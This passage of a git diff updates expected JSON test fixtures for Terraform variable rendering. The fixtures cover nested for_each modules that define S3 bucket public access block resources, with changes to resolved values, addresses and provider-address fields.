+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2"
+          true
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -986,15 +971,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              true
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -1002,30 +986,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2"
+          true
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -1034,15 +1020,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              true
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -1050,30 +1035,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2"
+          ""
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -1082,15 +1069,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -1098,12 +1084,12 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2"
+          ]
         }
       }
     ]
@@ -1111,17 +1097,19 @@
   "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2"
+          ""
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -1130,15 +1118,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -1146,30 +1133,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2"
+          true
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -1178,15 +1167,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              true
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -1194,12 +1182,12 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2"
+          ]
         }
       }
     ]
@@ -1207,17 +1195,19 @@
   "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2"
+          true
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -1226,15 +1216,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              true
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -1242,12 +1231,39 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2"
+          ]
+        }
+      }
+    ]
+  },
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/variable.tf\", \"tf_source_modules\": null}": {
+    "variable": [
+      {
+        "count_var": {
+          "__address__": "count_var",
+          "__end_line__": 4,
+          "__start_line__": 2,
+          "default": [
+            2
+          ]
+        }
+      },
+      {
+        "foreach_var": {
+          "__address__": "foreach_var",
+          "__end_line__": 8,
+          "__start_line__": 6,
+          "default": [
+            [
+              "a",
+              "b"
+            ]
+          ]
         }
       }
     ]
diff --git a/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json b/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json
index d8a6f2fa138..20e29ce8752 100644
--- a/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json
+++ b/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json
@@ -107,7 +107,7 @@
           ],
           "__start_line__": 1,
           "bucket2": [
-            "var.bucket"
+            false
           ],
           "source": [
             "./module2"
@@ -123,7 +123,7 @@
           ],
           "__start_line__": 6,
           "bucket2": [
-            "var.bucket2"
+            ""
           ],
           "source": [
             "./module2"
@@ -155,6 +155,64 @@
       }
     ]
   },
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": {
+    "module": [
+      {
+        "inner_s3_module": {
+          "__end_line__": 4,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
+          ],
+          "__start_line__": 1,
+          "bucket2": [
+            false
+          ],
+          "source": [
+            "./module2"
+          ],
+          "__address__": "module.s3_module[\"b\"].inner_s3_module"
+        }
+      },
+      {
+        "inner_s3_module2": {
+          "__end_line__": 9,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
+          ],
+          "__start_line__": 6,
+          "bucket2": [
+            ""
+          ],
+          "source": [
+            "./module2"
+          ],
+          "__address__": "module.s3_module[\"b\"].inner_s3_module2"
+        }
+      }
+    ],
+    "variable": [
+      {
+        "bucket": {
+          "__end_line__": 14,
+          "__start_line__": 12,
+          "type": [
+            "string"
+          ],
+          "__address__": "module.s3_module[\"b\"].bucket"
+        }
+      },
+      {
+        "bucket2": {
+          "__end_line__": 18,
+          "__start_line__": 16,
+          "type": [
+            "string"
+          ],
+          "__address__": "module.s3_module[\"b\"].bucket2"
+        }
+      }
+    ]
+  },
   "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}": {
     "module": [
       {
@@ -165,7 +223,7 @@
           ],
           "__start_line__": 1,
           "bucket2": [
-            "var.bucket"
+            ""
           ],
           "source": [
             "./module2"
@@ -181,7 +239,7 @@
           ],
           "__start_line__": 6,
           "bucket2": [
-            "var.bucket2"
+            true
           ],
           "source": [
             "./module2"
@@ -213,11 +271,69 @@
       }
     ]
   },
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": {
+    "module": [
+      {
+        "inner_s3_module": {
+          "__end_line__": 4,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
+          ],
+          "__start_line__": 1,
+          "bucket2": [
+            ""
+          ],
+          "source": [
+            "./module2"
+          ],
+          "__address__": "module.s3_module2[1].inner_s3_module"
+        }
+      },
+      {
+        "inner_s3_module2": {
+          "__end_line__": 9,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
+          ],
+          "__start_line__": 6,
+          "bucket2": [
+            true
+          ],
+          "source": [
+            "./module2"
+          ],
+          "__address__": "module.s3_module2[1].inner_s3_module2"
+        }
+      }
+    ],
+    "variable": [
+      {
+        "bucket": {
+          "__end_line__": 14,
+          "__start_line__": 12,
+          "type": [
+            "string"
+          ],
+          "__address__": "module.s3_module2[1].bucket"
+        }
+      },
+      {
+        "bucket2": {
+          "__end_line__": 18,
+          "__start_line__": 16,
+          "type": [
+            "string"
+          ],
+          "__address__": "module.s3_module2[1].bucket2"
+        }
+      }
+    ]
+  },
   "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
         "bucket2": [
-          "var.bucket"
+          false
         ],
         "__address__": "module.s3_module[\"a\"].module.inner_s3_module.bucket2"
       }
@@ -235,7 +351,7 @@
               true
             ],
             "bucket": [
-              "var.bucket"
+              false
             ],
             "ignore_public_acls": [
               true
@@ -243,7 +359,8 @@
             "restrict_public_buckets": [
               true
             ],
-            "__address__": "module.s3_module[\"a\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket"
+            "__address__": "module.s3_module[\"a\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket",
+            "__provider_address__": ""
           }
         }
       }
@@ -261,13 +378,13 @@
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
         "bucket2": [
-          "var.bucket"
+          false
         ],
-        "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2"
+        "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2"
       }
     ],
     "resource": [
@@ -283,7 +400,7 @@
               true
             ],
             "bucket": [
-              "var.bucket"
+              false
             ],
             "ignore_public_acls": [
               true
@@ -291,7 +408,8 @@
             "restrict_public_buckets": [
               true
             ],
-            "__address__": "module.s3_module2[0].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket"
+            "__address__": "module.s3_module[\"b\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket",
+            "__provider_address__": ""
           }
         }
       }
@@ -304,18 +422,18 @@
           "type": [
             "string"
           ],
-          "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2"
+          "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2"
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
     "locals": [
       {
         "bucket2": [
-          "var.bucket2"
+          ""
         ],
-        "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2"
+        "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2"
       }
     ],
     "resource": [
@@ -331,7 +449,7 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
@@ -339,7 +457,8 @@
             "restrict_public_buckets": [
               true
             ],
-            "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket"
+            "__address__": "module.s3_module2[0].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket",
+            "__provider_address__": ""
           }
         }
       }
@@ -352,18 +471,18 @@
           "type": [
             "string"
           ],
-          "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2"
+          "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2"
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
     "locals": [
       {
         "bucket2": [
-          "var.bucket2"
+          ""
         ],
-        "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2"
+        "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2"
       }
     ],
     "resource": [
@@ -379,7 +498,7 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
@@ -387,7 +506,8 @@
             "restrict_public_buckets": [
               true
             ],
-            "__address__": "module.s3_module2[0].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket"
+            "__address__": "module.s3_module2[1].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket",
+            "__provider_address__": ""
           }
         }
       }
@@ -400,103 +520,18 @@
           "type": [
             "string"
           ],
-          "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2"
-        }
-      }
-    ]
-  },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/variable.tf\", \"tf_source_modules\": null}": {
-    "variable": [
-      {
-        "count_var": {
-          "__end_line__": 4,
-          "__start_line__": 2,
-          "default": [
-            2
-          ],
-          "__address__": "count_var"
-        }
-      },
-      {
-        "foreach_var": {
-          "__end_line__": 8,
-          "__start_line__": 6,
-          "default": [
-            [
-              "a",
-              "b"
-            ]
-          ],
-          "__address__": "foreach_var"
-        }
-      }
-    ]
-  },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": {
-    "module": [
-      {
-        "inner_s3_module": {
-          "__end_line__": 4,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 1,
-          "bucket2": [
-            "var.bucket"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module[\"b\"].inner_s3_module"
-        }
-      },
-      {
-        "inner_s3_module2": {
-          "__end_line__": 9,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 6,
-          "bucket2": [
-            "var.bucket2"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module[\"b\"].inner_s3_module2"
-        }
-      }
-    ],
-    "variable": [
-      {
-        "bucket": {
-          "__end_line__": 14,
-          "__start_line__": 12,
-          "type": [
-            "string"
-          ],
-          "__address__": "module.s3_module[\"b\"].bucket"
-        }
-      },
-      {
-        "bucket2": {
-          "__end_line__": 18,
-          "__start_line__": 16,
-          "type": [
-            "string"
-          ],
-          "__address__": "module.s3_module[\"b\"].bucket2"
+          "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2"
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
         "bucket2": [
-          "var.bucket"
+          ""
         ],
-        "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2"
+        "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2"
       }
     ],
     "resource": [
@@ -512,7 +547,7 @@
               true
             ],
             "bucket": [
-              "var.bucket"
+              ""
             ],
             "ignore_public_acls": [
               true
@@ -520,7 +555,8 @@
             "restrict_public_buckets": [
               true
             ],
-            "__address__": "module.s3_module[\"b\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket"
+            "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket",
+            "__provider_address__": ""
           }
         }
       }
@@ -533,7 +569,7 @@
           "type": [
             "string"
           ],
-          "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2"
